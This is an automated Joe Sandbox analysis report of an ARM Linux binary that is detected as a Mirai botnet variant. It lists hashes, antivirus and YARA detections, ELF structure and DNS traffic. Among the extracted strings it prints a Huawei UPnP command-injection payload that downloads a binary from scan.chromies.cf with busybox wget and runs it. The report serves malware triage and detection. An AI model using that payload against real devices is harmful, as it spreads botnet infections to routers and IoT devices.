Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
CAtgZotl2p.elf

Overview

General Information

Sample Name:CAtgZotl2p.elf
Original Sample Name:05e0d5b0aa84ca78446d17c06417d27e.elf
Analysis ID:1351992
MD5:05e0d5b0aa84ca78446d17c06417d27e
SHA1:0ca79c0d02a92079640457c616332e80b8e98c4a
SHA256:f067f5bef259ad96ad0ffe070ef872af1d8b9f4bf21f6552f8a481e64191a6d1
Tags:32armelfmirai
Infos:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Exit code information suggests that the sample terminated abnormally, try to lookup the sample's target architecture.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1351992
Start date and time:2023-12-02 10:47:40 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 49s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:CAtgZotl2p.elf
renamed because original name is a hash value
Original Sample Name:05e0d5b0aa84ca78446d17c06417d27e.elf
Detection:MAL
Classification:mal72.troj.linELF@0/0@2/0
Command:/tmp/CAtgZotl2p.elf
PID:5454
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • CAtgZotl2p.elf (PID: 5454, Parent: 5371, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/CAtgZotl2p.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
CAtgZotl2p.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    CAtgZotl2p.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      5454.1.00007efb98017000.00007efb98035000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        5454.1.00007efb98017000.00007efb98035000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Process Memory Space: CAtgZotl2p.elf PID: 5454JoeSecurity_Mirai_6Yara detected MiraiJoe Security
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: CAtgZotl2p.elfAvira: detected
            Source: CAtgZotl2p.elfReversingLabs: Detection: 67%
            Source: CAtgZotl2p.elfVirustotal: Detection: 56%Perma Link
            Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CAtgZotl2p.elfString found in binary or memory: http://scan.chromies.cf/9x83HE5AFD/arm7.jade
            Source: CAtgZotl2p.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: CAtgZotl2p.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g scan.chromies.cf -l /tmp/binary -r /9x83HEAFD/mips.jade; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: classification engineClassification label: mal72.troj.linELF@0/0@2/0
            Source: /tmp/CAtgZotl2p.elf (PID: 5454)Queries kernel information via 'uname': Jump to behavior
            Source: CAtgZotl2p.elf, 5454.1.00007fffd7c93000.00007fffd7cb4000.rw-.sdmpBinary or memory string: ~qemu: uncaught target signal 11 (Segmentation fault) - core dumped
            Source: CAtgZotl2p.elf, 5454.1.00007fffd7c93000.00007fffd7cb4000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/CAtgZotl2p.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/CAtgZotl2p.elf
            Source: CAtgZotl2p.elf, 5454.1.0000563e80d9e000.0000563e80ecc000.rw-.sdmpBinary or memory string: >V!/etc/qemu-binfmt/arm
            Source: CAtgZotl2p.elf, 5454.1.0000563e80d9e000.0000563e80ecc000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: CAtgZotl2p.elf, 5454.1.00007fffd7c93000.00007fffd7cb4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: CAtgZotl2p.elf, 5454.1.00007fffd7c93000.00007fffd7cb4000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: CAtgZotl2p.elf, type: SAMPLE
            Source: Yara matchFile source: 5454.1.00007efb98017000.00007efb98035000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CAtgZotl2p.elf PID: 5454, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: CAtgZotl2p.elf, type: SAMPLE
            Source: Yara matchFile source: 5454.1.00007efb98017000.00007efb98035000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CAtgZotl2p.elf PID: 5454, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
            Security Software Discovery
            Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Non-Application Layer Protocol
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Application Layer Protocol
            SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            SourceDetectionScannerLabelLink
            CAtgZotl2p.elf68%ReversingLabsLinux.Trojan.Mirai
            CAtgZotl2p.elf56%VirustotalBrowse
            CAtgZotl2p.elf100%AviraEXP/ELF.Gafgyt.Gen.Z.A
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            daisy.ubuntu.com
            162.213.35.24
            truefalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              http://scan.chromies.cf/9x83HE5AFD/arm7.jadeCAtgZotl2p.elffalse
                unknown
                http://schemas.xmlsoap.org/soap/encoding/CAtgZotl2p.elffalse
                  high
                  http://schemas.xmlsoap.org/soap/envelope/CAtgZotl2p.elffalse
                    high
                    No contacted IP infos
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    daisy.ubuntu.comKKb8ltPB5k.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    56dyMA6RPt.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    K6TLLxsUm4.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    knRfwWDhoJ.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    0r0zSATcKS.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    RRV8vn1LmA.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    7PpPeXowYv.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.24
                    bot.arm6.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.25
                    arm6-20231127-1933.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.25
                    SecuriteInfo.com.ELF.Merlin-C.17284.15348.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.25
                    25QekUEI7u.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.25
                    SecuriteInfo.com.ELF.Mirai-CLZ.14797.9662.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.24
                    SecuriteInfo.com.ELF.Mirai-CLZ.13548.1196.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.24
                    arm6-20231125-2109.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.25
                    SecuriteInfo.com.ELF.Mirai-CLZ.11900.31985.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.24
                    SecuriteInfo.com.ELF.Mirai-CLZ.9952.8166.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.24
                    SecuriteInfo.com.ELF.Mirai-CLZ.23937.20485.elfGet hashmaliciousUnknownBrowse
                    • 162.213.35.24
                    YEcmxSymXx.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    H2OePICEV5.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    Bc25hLUROc.elfGet hashmaliciousMiraiBrowse
                    • 162.213.35.24
                    No context
                    No context
                    No context
                    No created / dropped files found
                    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                    Entropy (8bit):6.07457871760232
                    TrID:
                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                    File name:CAtgZotl2p.elf
                    File size:124'212 bytes
                    MD5:05e0d5b0aa84ca78446d17c06417d27e
                    SHA1:0ca79c0d02a92079640457c616332e80b8e98c4a
                    SHA256:f067f5bef259ad96ad0ffe070ef872af1d8b9f4bf21f6552f8a481e64191a6d1
                    SHA512:816355ffb82fc3a0ad9ba7ac71b22c0a0c95e26f29614d285ad8c5f9c60c8784c8d728308e1ff367466e73b157f77cafb611136dff9f8b564474e75f390e3047
                    SSDEEP:3072:QhlSAljDnYNmZL7YqttC4cCraRkFQRlOYPYMTl:QhlSAxDLzI47ra6wljLTl
                    TLSH:ECC31A82AC419B15DAC3167AFE1F108E331257ACF3ED73129D145B2477CA91B0E7B61A
                    File Content Preview:.ELF..............(.....T...4...T.......4. ...(.....................................................................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../...............-.@0....S

                    ELF header

                    Class:ELF32
                    Data:2's complement, little endian
                    Version:1 (current)
                    Machine:ARM
                    Version Number:0x1
                    Type:EXEC (Executable file)
                    OS/ABI:UNIX - System V
                    ABI Version:0
                    Entry Point Address:0x8154
                    Flags:0x4000002
                    ELF Header Size:52
                    Program Header Offset:52
                    Program Header Size:32
                    Number of Program Headers:3
                    Section Header Offset:123732
                    Section Header Size:40
                    Number of Section Headers:12
                    Header String Table Index:11
                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                    NULL0x00x00x00x00x0000
                    .initPROGBITS0x80940x940x100x00x6AX004
                    .textPROGBITS0x80b00xb00x1ab8c0x00x6AX0016
                    .finiPROGBITS0x22c3c0x1ac3c0x100x00x6AX004
                    .rodataPROGBITS0x22c500x1ac500x29bc0x00x2A008
                    .init_arrayINIT_ARRAY0x2e0040x1e0080x40x00x3WA004
                    .fini_arrayFINI_ARRAY0x2e0080x1e00c0x40x00x3WA004
                    .gotPROGBITS0x2e0100x1e0140x740x40x3WA004
                    .dataPROGBITS0x2e0840x1e0880x25c0x00x3WA004
                    .bssNOBITS0x2e2e00x1e2e40x28d40x00x3WA004
                    .ARM.attributesARM_ATTRIBUTES0x00x1e2e40x100x00x0001
                    .shstrtabSTRTAB0x00x1e2f40x5d0x00x0001
                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                    LOAD0x00x80000x80000x1d60c0x1d60c6.16380x5R E0x8000.init .text .fini .rodata
                    LOAD0x1e0040x2e0040x2e0000x2e00xabb03.68800x6RW 0x8000.init_array .fini_array .got .data .bss
                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 2, 2023 10:48:48.307266951 CET5834053192.168.2.131.1.1.1
                    Dec 2, 2023 10:48:48.307327986 CET5637253192.168.2.131.1.1.1
                    Dec 2, 2023 10:48:48.436078072 CET53563721.1.1.1192.168.2.13
                    Dec 2, 2023 10:48:48.438626051 CET53583401.1.1.1192.168.2.13
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Dec 2, 2023 10:48:48.307266951 CET192.168.2.131.1.1.10x6f77Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                    Dec 2, 2023 10:48:48.307327986 CET192.168.2.131.1.1.10xe388Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Dec 2, 2023 10:48:48.438626051 CET1.1.1.1192.168.2.130x6f77No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                    Dec 2, 2023 10:48:48.438626051 CET1.1.1.1192.168.2.130x6f77No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                    System Behavior

                    Start time (UTC):09:48:45
                    Start date (UTC):02/12/2023
                    Path:/tmp/CAtgZotl2p.elf
                    Arguments:/tmp/CAtgZotl2p.elf
                    File size:4956856 bytes
                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1